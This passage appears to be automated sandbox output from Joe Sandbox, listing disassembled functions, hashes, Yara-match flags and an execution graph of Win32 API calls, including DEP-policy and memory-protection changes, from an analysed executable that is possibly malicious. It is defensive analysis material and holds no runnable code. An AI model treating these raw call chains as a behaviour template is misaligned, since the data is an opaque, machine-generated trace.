                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 3058430110-0
                                                                  • Opcode ID: e224db6d442c4383dec286caddee01323d1a9b74086a6ff5f5bdec3bc306d917
                                                                  • Instruction ID: c1c6d2d90700bb89a23820e70023eb6faf0b0996d5bc632f70591ff8279ac006
                                                                  • Opcode Fuzzy Hash: e224db6d442c4383dec286caddee01323d1a9b74086a6ff5f5bdec3bc306d917
                                                                  • Instruction Fuzzy Hash: 1131C231900345EFCB10DF64C884AAE3BB4EF01350F19897AE4A5AB2D1D336DD61DB5A
                                                                  Function 0063C2E4 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0063C300
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0063C319
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Value___vcrt_
                                                                  • String ID:
                                                                  • API String ID: 1426506684-0
                                                                  • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                                  • Instruction ID: 3749880c75a45a6b8eac1f779edb987ce3a485797d04c505634ab316e8d7cfc2
                                                                  • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                                  • Instruction Fuzzy Hash: 2501D8322096119EF67427B87CC599B2ADAFB01774F60823DF510B51E3EF255C0252D8
                                                                  Function 0040D324 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                  • String ID:
                                                                  • API String ID: 3016257755-0
                                                                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                  • Instruction ID: c58f584344cc129f44cbeb7ed45c579eb2bf2b78e110a3470603264a11baad7e
                                                                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                  • Instruction Fuzzy Hash: 3B11607240004EFBCF165ED5DC41CEE3F22BB08354F588426FE1869164D23AC9B5AB86
                                                                  Function 0063C120 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0063C15F
                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0063C213
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                  • String ID: csm
                                                                  • API String ID: 3480331319-1018135373
                                                                  • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                                                                  • Instruction ID: c2d31e345bf9dd372697c0bac89544be27c3bb0cc830d1f95f63d22d11481c21
                                                                  • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                                                                  • Instruction Fuzzy Hash: 2B41B234A00218ABCF10DFA8D880ADEBBB6AF45324F148169F815AB352C7319A15DBD5
                                                                  Function 00631CD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 00631D5B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: BAOJ$JAY@
                                                                  • API String ID: 1385522511-1137680417
                                                                  • Opcode ID: a0d43f2bff2cdd8459d4469a3dc09680b743f1bf2a176f00ca3623db7dc0a4ed
                                                                  • Instruction ID: a53652c4166c7e4559b8034c9852d78ae427b0f264ebb36748bc45b729289795
                                                                  • Opcode Fuzzy Hash: a0d43f2bff2cdd8459d4469a3dc09680b743f1bf2a176f00ca3623db7dc0a4ed
                                                                  • Instruction Fuzzy Hash: A6215770F002449AD730DF68E8467A9B3A0FF16304FA0426DE8444B262DBB41582DB8E
                                                                  Function 00638DA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 00638E0E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: G@ZK$[@G_
                                                                  • API String ID: 1385522511-2338778587
                                                                  • Opcode ID: 1e8f8208f12b7c16407fd68a52fe85551186d20058d4469b98e4fffa1dba6e00
                                                                  • Instruction ID: 3ce7e70523e69481ddd743886623092db3085acf4b2738581d0d8d782c23fd83
                                                                  • Opcode Fuzzy Hash: 1e8f8208f12b7c16407fd68a52fe85551186d20058d4469b98e4fffa1dba6e00
                                                                  • Instruction Fuzzy Hash: 7201D670F00344CFC710EFB8EC419ADB7B1A719310FA0016DF565AB291DA75A8019B8A
                                                                  Function 006387C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 0063882E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: G@ZK$[@G_
                                                                  • API String ID: 1385522511-2338778587
                                                                  • Opcode ID: 7838c3211c085e07b27c5848d939389a9bfd04a1f51875a12125b6f39e7dd458
                                                                  • Instruction ID: 5642563f8dfef5e1eb1b2032252fba955b6515ff81a2b6628b4b50181208c3cf
                                                                  • Opcode Fuzzy Hash: 7838c3211c085e07b27c5848d939389a9bfd04a1f51875a12125b6f39e7dd458
                                                                  • Instruction Fuzzy Hash: 9601D6F0F01204CBD720DFA8AD41AADB7B0AB19310F9001ADF4556B291DA355842DB8A
                                                                  Function 00638170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 006381D9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: @G@K$A@K.
                                                                  • API String ID: 1385522511-2457859030
                                                                  • Opcode ID: 6a18aaa1088744a2cef52ce5b21989f42f77fe0bf8ffefca87306ddb1a3f9198
                                                                  • Instruction ID: 97c8cac64474be6e2fbd18f79813d47044f6dfec67fdc2a876a0994497c7e5db
                                                                  • Opcode Fuzzy Hash: 6a18aaa1088744a2cef52ce5b21989f42f77fe0bf8ffefca87306ddb1a3f9198
                                                                  • Instruction Fuzzy Hash: A3018674F002049FC750DF98E942A9CB7B1E708300FA0017EE95697791DB75AA419B9E
                                                                  Function 00638280 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 006382E9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: @G@K$ZYA.
                                                                  • API String ID: 1385522511-4236202813
                                                                  • Opcode ID: 3264282d574ff772c11f641d984cce154067a6c0aea3269eae2f2ae7d2ec284f
                                                                  • Instruction ID: 0c2daa01c8e8416d76471be3082ae15a80cafe71b05204c9cc1f0a520add05e4
                                                                  • Opcode Fuzzy Hash: 3264282d574ff772c11f641d984cce154067a6c0aea3269eae2f2ae7d2ec284f
                                                                  • Instruction Fuzzy Hash: 07018674F00305DFC714EF98E991A9C77B1AB04310F90017EE96557391DA746941DB8A

                                                                  Execution Graph

                                                                  Execution Coverage:21.2%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:1.6%
                                                                  Total number of Nodes:1498
                                                                  Total number of Limit Nodes:22
                                                                  execution_graph 4978 409c40 5019 4030dc 4978->5019 4980 409c56 5022 4042e8 4980->5022 4982 409c5b 5025 40457c GetModuleHandleA GetProcAddress 4982->5025 4988 409c6a 5042 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4988->5042 5005 409d43 5104 4074a0 5005->5104 5007 409d05 5007->5005 5137 409aa0 5007->5137 5008 409d84 5108 407a28 5008->5108 5009 409d69 5009->5008 5010 409aa0 4 API calls 5009->5010 5010->5008 5012 409da9 5118 408b08 5012->5118 5016 409def 5017 408b08 21 API calls 5016->5017 5018 409e28 5016->5018 5017->5016 5147 403094 5019->5147 5021 4030e1 GetModuleHandleA GetCommandLineA 5021->4980 5024 404323 5022->5024 5148 403154 5022->5148 5024->4982 5026 404598 5025->5026 5027 40459f GetProcAddress 5025->5027 5026->5027 5028 4045b5 GetProcAddress 5027->5028 5029 4045ae 5027->5029 5030 4045c4 SetProcessDEPPolicy 5028->5030 5031 4045c8 5028->5031 5029->5028 5030->5031 5032 4065b8 5031->5032 5161 405c98 5032->5161 5041 406604 6F551CD0 5041->4988 5043 4090f7 5042->5043 5288 406fa0 SetErrorMode 5043->5288 5048 403198 4 API calls 5049 40913c 5048->5049 5050 409b30 GetSystemInfo VirtualQuery 5049->5050 5051 409be4 5050->5051 5052 409b5a 5050->5052 5056 409768 5051->5056 5052->5051 5053 409bc5 VirtualQuery 5052->5053 5054 409b84 VirtualProtect 5052->5054 5055 409bb3 VirtualProtect 5052->5055 5053->5051 5053->5052 5054->5052 5055->5053 5298 406bd0 GetCommandLineA 5056->5298 5058 409825 5060 4031b8 4 API calls 5058->5060 5059 406c2c 6 API calls 5062 409785 5059->5062 5061 40983f 5060->5061 5064 406c2c 5061->5064 5062->5058 5062->5059 5063 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5062->5063 5063->5062 5065 406c53 GetModuleFileNameA 5064->5065 5066 406c77 GetCommandLineA 5064->5066 5067 403278 4 API calls 5065->5067 5068 406c7c 5066->5068 5069 406c75 5067->5069 5070 406c81 5068->5070 5071 406af0 4 API calls 5068->5071 5074 406c89 5068->5074 5072 406ca4 5069->5072 5073 403198 4 API calls 5070->5073 5071->5068 5075 403198 4 API calls 5072->5075 5073->5074 5076 40322c 4 API calls 5074->5076 5077 406cb9 5075->5077 5076->5072 5078 4031e8 5077->5078 5079 4031ec 5078->5079 5082 4031fc 5078->5082 5081 403254 4 API calls 5079->5081 5079->5082 5080 403228 5084 4074e0 5080->5084 5081->5082 5082->5080 5083 4025ac 4 API calls 5082->5083 5083->5080 5085 4074ea 5084->5085 5319 407576 5085->5319 5322 407578 5085->5322 5086 407516 5087 40752a 5086->5087 5325 40748c GetLastError 5086->5325 5091 409bec FindResourceA 5087->5091 5092 409c01 5091->5092 5093 409c06 SizeofResource 5091->5093 5094 409aa0 4 API calls 5092->5094 5095 409c13 5093->5095 5096 409c18 LoadResource 5093->5096 5094->5093 5097 409aa0 4 API calls 5095->5097 5098 409c26 5096->5098 5099 409c2b LockResource 5096->5099 5097->5096 5100 409aa0 4 API calls 5098->5100 5101 409c37 5099->5101 5102 409c3c 5099->5102 5100->5099 5103 409aa0 4 API calls 5101->5103 5102->5007 5134 407918 5102->5134 5103->5102 5105 4074b4 5104->5105 5106 4074c4 5105->5106 5107 4073ec 20 API calls 5105->5107 5106->5009 5107->5106 5109 407a35 5108->5109 5110 405880 4 API calls 5109->5110 5111 407a89 5109->5111 5110->5111 5112 407918 InterlockedExchange 5111->5112 5113 407a9b 5112->5113 5114 405880 4 API calls 5113->5114 5115 407ab1 5113->5115 5114->5115 5116 405880 4 API calls 5115->5116 5117 407af4 5115->5117 5116->5117 5117->5012 5127 408b82 5118->5127 5133 408b39 5118->5133 5119 407cb8 21 API calls 5119->5133 5120 408bcd 5433 407cb8 5120->5433 5121 407cb8 21 API calls 5121->5127 5124 408be4 5126 4031b8 4 API calls 5124->5126 5125 4034f0 4 API calls 5125->5127 5128 408bfe 5126->5128 5127->5120 5127->5121 5127->5125 5131 403420 4 API calls 5127->5131 5132 4031e8 4 API calls 5127->5132 5144 404c10 5128->5144 5129 403420 4 API calls 5129->5133 5130 4031e8 4 API calls 5130->5133 5131->5127 5132->5127 5133->5119 5133->5127 5133->5129 5133->5130 5424 4034f0 5133->5424 5459 4078c4 5134->5459 5138 409ac1 5137->5138 5139 409aa9 5137->5139 5141 405880 4 API calls 5138->5141 5140 405880 4 API calls 5139->5140 5142 409abb 5140->5142 5143 409ad2 5141->5143 5142->5005 5143->5005 5145 402594 4 API calls 5144->5145 5146 404c1b 5145->5146 5146->5016 5147->5021 5149 403164 5148->5149 5150 40318c TlsGetValue 5148->5150 5149->5024 5151 403196 5150->5151 5152 40316f 5150->5152 5151->5024 5156 40310c 5152->5156 5154 403174 TlsGetValue 5155 403184 5154->5155 5155->5024 5157 403120 LocalAlloc 5156->5157 5158 403116 5156->5158 5159 40313e TlsSetValue 5157->5159 5160 403132 5157->5160 5158->5157 5159->5160 5160->5154 5233 405930 5161->5233 5164 405270 GetSystemDefaultLCID 5166 4052a6 5164->5166 5165 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5165->5166 5166->5165 5167 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5166->5167 5168 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5166->5168 5171 405308 5166->5171 5167->5166 5168->5166 5169 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5169->5171 5170 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5170->5171 5171->5169 5171->5170 5172 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5171->5172 5173 40538b 5171->5173 5172->5171 5266 4031b8 5173->5266 5176 4053b4 GetSystemDefaultLCID 5270 4051fc GetLocaleInfoA 5176->5270 5179 4031e8 4 API calls 5180 4053f4 5179->5180 5181 4051fc 5 API calls 5180->5181 5182 405409 5181->5182 5183 4051fc 5 API calls 5182->5183 5184 40542d 5183->5184 5276 405248 GetLocaleInfoA 5184->5276 5187 405248 GetLocaleInfoA 5188 40545d 5187->5188 5189 4051fc 5 API calls 5188->5189 5190 405477 5189->5190 5191 405248 GetLocaleInfoA 5190->5191 5192 405494 5191->5192 5193 4051fc 5 API calls 5192->5193 5194 4054ae 5193->5194 5195 4031e8 4 API calls 5194->5195 5196 4054bb 5195->5196 5197 4051fc 5 API calls 5196->5197 5198 4054d0 5197->5198 5199 4031e8 4 API calls 5198->5199 5200 4054dd 5199->5200 5201 405248 GetLocaleInfoA 5200->5201 5202 4054eb 5201->5202 5203 4051fc 5 API calls 5202->5203 5204 405505 5203->5204 5205 4031e8 4 API calls 5204->5205 5206 405512 5205->5206 5207 4051fc 5 API calls 5206->5207 5208 405527 5207->5208 5209 4031e8 4 API calls 5208->5209 5210 405534 5209->5210 5211 4051fc 5 API calls 5210->5211 5212 405549 5211->5212 5213 405566 5212->5213 5214 405557 5212->5214 5215 40322c 4 API calls 5213->5215 5284 40322c 5214->5284 5217 405564 5215->5217 5218 4051fc 5 API calls 5217->5218 5219 405588 5218->5219 5220 4055a5 5219->5220 5221 405596 5219->5221 5223 403198 4 API calls 5220->5223 5222 40322c 4 API calls 5221->5222 5224 4055a3 5222->5224 5223->5224 5278 4033b4 5224->5278 5226 4055c7 5227 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5226->5227 5228 4055e1 5227->5228 5229 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5228->5229 5230 4055fb 5229->5230 5231 405ce4 GetVersionExA 5230->5231 5232 405cfb 5231->5232 5232->5041 5234 40593c 5233->5234 5241 404ccc LoadStringA 5234->5241 5237 4031e8 4 API calls 5238 40596d 5237->5238 5244 403198 5238->5244 5248 403278 5241->5248 5245 4031b7 5244->5245 5246 40319e 5244->5246 5245->5164 5246->5245 5262 4025ac 5246->5262 5253 403254 5248->5253 5250 403288 5251 403198 4 API calls 5250->5251 5252 4032a0 5251->5252 5252->5237 5254 403274 5253->5254 5255 403258 5253->5255 5254->5250 5258 402594 5255->5258 5257 403261 5257->5250 5259 402598 5258->5259 5260 4025a2 5258->5260 5259->5260 5261 403154 4 API calls 5259->5261 5260->5257 5260->5260 5261->5260 5263 4025b0 5262->5263 5264 4025ba 5262->5264 5263->5264 5265 403154 4 API calls 5263->5265 5264->5245 5264->5264 5265->5264 5268 4031be 5266->5268 5267 4031e3 5267->5176 5268->5267 5269 4025ac 4 API calls 5268->5269 5269->5268 5271 405223 5270->5271 5272 405235 5270->5272 5273 403278 4 API calls 5271->5273 5274 40322c 4 API calls 5272->5274 5275 405233 5273->5275 5274->5275 5275->5179 5277 405264 5276->5277 5277->5187 5279 4033bc 5278->5279 5280 403254 4 API calls 5279->5280 5281 4033cf 5280->5281 5282 4031e8 4 API calls 5281->5282 5283 4033f7 5282->5283 5286 403230 5284->5286 5285 403252 5285->5217 5286->5285 5287 4025ac 4 API calls 5286->5287 5287->5285 5296 403414 5288->5296 5291 406fee 5292 407284 FormatMessageA 5291->5292 5293 4072aa 5292->5293 5294 403278 4 API calls 5293->5294 5295 4072c7 5294->5295 5295->5048 5297 403418 LoadLibraryA 5296->5297 5297->5291 5305 406af0 5298->5305 5300 406bf3 5301 406c05 5300->5301 5302 406af0 4 API calls 5300->5302 5303 403198 4 API calls 5301->5303 5302->5300 5304 406c1a 5303->5304 5304->5062 5306 406b1c 5305->5306 5307 403278 4 API calls 5306->5307 5308 406b29 5307->5308 5315 403420 5308->5315 5310 406b31 5311 4031e8 4 API calls 5310->5311 5312 406b49 5311->5312 5313 403198 4 API calls 5312->5313 5314 406b6b 5313->5314 5314->5300 5316 403426 5315->5316 5318 403437 5315->5318 5317 403254 4 API calls 5316->5317 5316->5318 5317->5318 5318->5310 5320 407578 5319->5320 5321 4075b7 CreateFileA 5320->5321 5321->5086 5323 403414 5322->5323 5324 4075b7 CreateFileA 5323->5324 5324->5086 5328 4073ec 5325->5328 5329 407284 5 API calls 5328->5329 5330 407414 5329->5330 5331 407434 5330->5331 5337 405184 5330->5337 5340 405880 5331->5340 5334 407443 5335 403198 4 API calls 5334->5335 5336 407460 5335->5336 5336->5087 5344 405198 5337->5344 5341 405887 5340->5341 5342 4031e8 4 API calls 5341->5342 5343 40589f 5342->5343 5343->5334 5345 4051b5 5344->5345 5352 404e48 5345->5352 5348 4051e1 5350 403278 4 API calls 5348->5350 5351 405193 5350->5351 5351->5331 5355 404e63 5352->5355 5353 404e75 5353->5348 5357 404bd4 5353->5357 5355->5353 5360 404f6a 5355->5360 5367 404e3c 5355->5367 5358 405930 5 API calls 5357->5358 5359 404be5 5358->5359 5359->5348 5361 404f7b 5360->5361 5364 404fc9 5360->5364 5363 40504f 5361->5363 5361->5364 5366 404fe7 5363->5366 5374 404e28 5363->5374 5364->5366 5370 404de4 5364->5370 5366->5355 5368 403198 4 API calls 5367->5368 5369 404e46 5368->5369 5369->5355 5371 404df2 5370->5371 5377 404bec 5371->5377 5373 404e20 5373->5364 5390 4039a4 5374->5390 5380 4059a0 5377->5380 5379 404c05 5379->5373 5381 4059ae 5380->5381 5382 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5381->5382 5383 4059d8 5382->5383 5384 405184 19 API calls 5383->5384 5385 4059e6 5384->5385 5386 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5385->5386 5387 4059f1 5386->5387 5388 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5387->5388 5389 405a0b 5388->5389 5389->5379 5391 4039ab 5390->5391 5396 4038b4 5391->5396 5393 4039cb 5394 403198 4 API calls 5393->5394 5395 4039d2 5394->5395 5395->5366 5397 4038d5 5396->5397 5398 4038c8 5396->5398 5400 403934 5397->5400 5401 4038db 5397->5401 5399 403780 6 API calls 5398->5399 5404 4038d0 5399->5404 5402 403993 5400->5402 5403 40393b 5400->5403 5405 4038e1 5401->5405 5406 4038ee 5401->5406 5407 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5402->5407 5408 403941 5403->5408 5409 40394b 5403->5409 5404->5393 5410 403894 6 API calls 5405->5410 5411 403894 6 API calls 5406->5411 5407->5404 5412 403864 9 API calls 5408->5412 5413 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5409->5413 5410->5404 5414 4038fc 5411->5414 5412->5404 5415 40395d 5413->5415 5416 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5414->5416 5418 403864 9 API calls 5415->5418 5417 403917 5416->5417 5420 40374c VariantClear 5417->5420 5419 403976 5418->5419 5422 40374c VariantClear 5419->5422 5421 40392c 5420->5421 5421->5393 5423 40398b 5422->5423 5423->5393 5425 4034fd 5424->5425 5431 40352d 5424->5431 5427 403526 5425->5427 5429 403509 5425->5429 5426 403198 4 API calls 5432 403517 5426->5432 5428 403254 4 API calls 5427->5428 5428->5431 5439 4025c4 5429->5439 5431->5426 5432->5133 5434 407cd3 5433->5434 5438 407cc8 5433->5438 5443 407c5c 5434->5443 5437 405880 4 API calls 5437->5438 5438->5124 5440 4025ca 5439->5440 5441 4025dc 5440->5441 5442 403154 4 API calls 5440->5442 5441->5432 5441->5441 5442->5441 5444 407c70 5443->5444 5445 407caf 5443->5445 5444->5445 5447 407bac 5444->5447 5445->5437 5445->5438 5448 407bb7 5447->5448 5451 407bc8 5447->5451 5449 405880 4 API calls 5448->5449 5449->5451 5450 4074a0 20 API calls 5452 407bdc 5450->5452 5451->5450 5453 4074a0 20 API calls 5452->5453 5454 407bfd 5453->5454 5455 407918 InterlockedExchange 5454->5455 5456 407c12 5455->5456 5457 407c28 5456->5457 5458 405880 4 API calls 5456->5458 5457->5444 5458->5457 5460 4078d6 5459->5460 5461 4078e7 5459->5461 5462 4078db InterlockedExchange 5460->5462 5461->5007 5462->5461 6235 409e47 6236 409e6c 6235->6236 6237 4098f4 15 API calls 6236->6237 6241 409e71 6237->6241 6238 409ec4 6269 4026c4 GetSystemTime 6238->6269 6240 409ec9 6242 409330 32 API calls 6240->6242 6241->6238 6244 408dd8 4 API calls 6241->6244 6243 409ed1 6242->6243 6245 4031e8 4 API calls 6243->6245 6246 409ea0 6244->6246 6247 409ede 6245->6247 6248 409ea8 MessageBoxA 6246->6248 6249 406928 5 API calls 6247->6249 6248->6238 6250 409eb5 6248->6250 6251 409eeb 6249->6251 6252 405854 5 API calls 6250->6252 6253 4066c0 5 API calls 6251->6253 6252->6238 6254 409efb 6253->6254 6255 406638 5 API calls 6254->6255 6256 409f0c 6255->6256 6257 403340 4 API calls 6256->6257 6258 409f1a 6257->6258 6259 4031e8 4 API calls 6258->6259 6260 409f2a 6259->6260 6261 4074e0 23 API calls 6260->6261 6262 409f69 6261->6262 6263 402594 4 API calls 6262->6263 6264 409f89 6263->6264 6265 407a28 5 API calls 6264->6265 6266 409fcb 6265->6266 6267 407cb8 21 API calls 6266->6267 6268 409ff2 6267->6268 6269->6240 6196 407548 6197 407554 CloseHandle 6196->6197 6198 40755d 6196->6198 6197->6198 6648 402b48 RaiseException 6199 407749 6200 4076dc WriteFile 6199->6200 6209 407724 6199->6209 6201 4076e8 6200->6201 6202 4076ef 6200->6202 6203 40748c 21 API calls 6201->6203 6204 407700 6202->6204 6205 4073ec 20 API calls 6202->6205 6203->6202 6205->6204 6206 4077e0 6207 4078db InterlockedExchange 6206->6207 6208 407890 6206->6208 6210 4078e7 6207->6210 6209->6199 6209->6206 6649 40294a 6650 402952 6649->6650 6651 402967 6650->6651 6652 403554 4 API calls 6650->6652 6652->6650 6653 403f4a 6654 403f53 6653->6654 6655 403f5c 6653->6655 6657 403f07 6654->6657 6660 403f09 6657->6660 6659 403f3c 6659->6655 6662 403154 4 API calls 6660->6662 6664 403e9c 6660->6664 6667 403f3d 6660->6667 6680 403e9c 6660->6680 6661 403ecf 6661->6655 6662->6660 6663 403ef2 6665 402674 4 API calls 6663->6665 6664->6659 6664->6663 6669 403ea9 6664->6669 6671 403e8e 6664->6671 6665->6661 6667->6655 6669->6661 6670 402674 4 API calls 6669->6670 6670->6661 6672 403e4c 6671->6672 6673 403e67 6672->6673 6674 403e62 6672->6674 6675 403e7b 6672->6675 6678 403e78 6673->6678 6679 402674 4 API calls 6673->6679 6677 403cc8 4 API calls 6674->6677 6676 402674 4 API calls 6675->6676 6676->6678 6677->6673 6678->6663 6678->6669 6679->6678 6681 403ed7 6680->6681 6687 403ea9 6680->6687 6683 403ef2 6681->6683 6685 403e8e 4 API calls 6681->6685 6682 403ecf 6682->6660 6684 402674 4 API calls 6683->6684 6684->6682 6686 403ee6 6685->6686 6686->6683 6686->6687 6687->6682 6688 402674 4 API calls 6687->6688 6688->6682 6697 405150 6698 405163 6697->6698 6699 404e48 19 API calls 6698->6699 6700 405177 6699->6700 6270 403a52 6271 403a74 6270->6271 6272 403a5a WriteFile 6270->6272 6272->6271 6273 403a78 GetLastError 6272->6273 6273->6271 6274 402654 6275 403154 4 API calls 6274->6275 6276 402614 6275->6276 6277 402632 6276->6277 6278 403154 4 API calls 6276->6278 6277->6277 6278->6277 5645 409e62 5646 409aa0 4 API calls 5645->5646 5647 409e67 5646->5647 5648 409e6c 5647->5648 5748 402f24 5647->5748 5682 4098f4 5648->5682 5651 409e71 5652 409ec4 5651->5652 5753 408dd8 5651->5753 5687 4026c4 GetSystemTime 5652->5687 5654 409ec9 5688 409330 5654->5688 5658 4031e8 4 API calls 5660 409ede 5658->5660 5659 409ea0 5661 409ea8 MessageBoxA 5659->5661 5706 406928 5660->5706 5661->5652 5663 409eb5 5661->5663 5756 405854 5663->5756 5669 409f0c 5733 403340 5669->5733 5671 409f1a 5672 4031e8 4 API calls 5671->5672 5673 409f2a 5672->5673 5674 4074e0 23 API calls 5673->5674 5675 409f69 5674->5675 5676 402594 4 API calls 5675->5676 5677 409f89 5676->5677 5678 407a28 5 API calls 5677->5678 5679 409fcb 5678->5679 5680 407cb8 21 API calls 5679->5680 5681 409ff2 5680->5681 5760 40953c 5682->5760 5687->5654 5697 409350 5688->5697 5691 409375 CreateDirectoryA 5692 4093ed 5691->5692 5693 40937f GetLastError 5691->5693 5694 40322c 4 API calls 5692->5694 5693->5697 5695 4093f7 5694->5695 5698 4031b8 4 API calls 5695->5698 5696 408dd8 4 API calls 5696->5697 5697->5691 5697->5696 5702 407284 5 API calls 5697->5702 5705 405880 4 API calls 5697->5705 5852 406cf4 5697->5852 5875 409224 5697->5875 5894 404c84 5697->5894 5897 408da8 5697->5897 5700 409411 5698->5700 5701 4031b8 4 API calls 5700->5701 5703 40941e 5701->5703 5702->5697 5703->5658 5705->5697 6007 406820 5706->6007 5709 403454 4 API calls 5710 40694a 5709->5710 5711 4066c0 5710->5711 